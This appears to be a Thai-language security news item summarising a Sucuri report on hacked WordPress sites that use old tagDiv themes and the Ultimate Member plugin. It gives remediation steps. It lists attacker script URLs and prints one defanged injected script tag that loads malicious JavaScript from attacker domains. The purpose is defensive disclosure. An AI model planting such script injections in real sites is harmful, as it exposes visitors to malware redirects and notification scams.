นักวิจัยจาก sucuri ได้ออกมาเปิดเผยเกี่ยวกับช่องโหว่เปลี่ยนเส้นทางการเข้าชมเว็บไซต์ไปยังเว็บที่ไม่ต้องการ เมื่อมีเปลี่ยนเส้นทางเว็บ ผู้ใช้จะเห็นหน้าเพจที่สุ่มขึ้นมาจาก utroro.com และภาพ reCAPTCHA ที่สร้างขึ้นเพื่อหลอกลวงผู้ใช้ ช่องโหว่นี้สร้างขึ้นมาเพื่อ

  1. ชักชวนให้ผู้ใช้เข้าชมและสมัครรับการแจ้งเตือนจากเบราว์เซอร์ โดยไม่ระบุเหตุผลถึงการแจ้งเตือนนั้น
  2. เปลี่ยนเส้นทางการเข้าชมไปยังเว็บต่างๆ กับ Javascript ที่มีมัลแวร์

ช่องโหว่นี้เกิดจากการใช้ tagDiv Themes เวอร์ชั่นเมื่อ 2 ปีที่แล้ว และใช้ปลั๊กอิน Ultimate Member โดย Hacker จะทำการฉีดสคริปต์ที่เป็นอันตรายลงบนเว็บไซต์ เมื่อมีผู้เข้าชมเว็บจะมีการเปลี่ยนเส้นทางเว็บไปยังเว็บที่มีมัลแวร์ หรือสร้างข้อความหลอกลวงเพื่อให้ผู้ใช้สมัครรับการแจ้งเตือน

รายละเอียดเพิ่มเติมสามารถดูได้ที่ Sucuri Blog

ตัวอย่าง URL ที่ถูกใช้ในการสุ่ม

    • cdn.allyouwant.online/main.js?t=ac
    • src.eeduelements.com/get.php
    • gabemastery.ml/ton.js
    • alsutrans.com/stats.js

ตัวอย่างสคริปต์ที่แทรกเขาไปในเว็บ cdn.eeduelements [.] com และ cdn.allyouwant [.] online

<script type=’text/javascript’ src=’hxxps://cdn.eeduelements[.]com/jquery.js?ver=1.0.8′></script><script type=’text/javascript’ src=’hxxps://cdn.allyouwant[.]online/main.js?t=lp1′></script></head>

สำหรับวิธีการป้องกัน

  1. อัปเดต tagDiv Themes และ ปลั๊กอิน Ultimate Member ให้เป็นเวอร์ชั่นล่าสุด
  2. ช่องโหว่ tagDiv Themes สามารถพบมัลแวร์ และกำจัดได้ผ่าน admin theme interface โดยไปที่ Theme panel > ADS > YOUR HEADER AD, หรือในวิดเจ็ต “Custom HTML”
  3. ช่องโหว่ ปลั๊กอิน Ultimate Member ให้ลบไฟล์ PHP ทั้งหมดในไดเร้กทอรีใต้ wp-content/uploads/ultimatemember/temp/ (ส่วน bonus points สามารถปิดการรันไฟล์ PHP files ในโฟลเดอร์นี้ได้เลย) จากนั้นลบโค้ดที่เป็นอันตรายออกไป
  4. ทำการสแกนตรวจไวรัสบนเว็บไซต์ทั้งหมดที่อยู่ในเซิร์ฟเวอร์เดียวกันว่าไม่มีปลั๊กอิน หรือมัลแวร์ที่เป็นอันตราย

ที่มา Sucuri Blog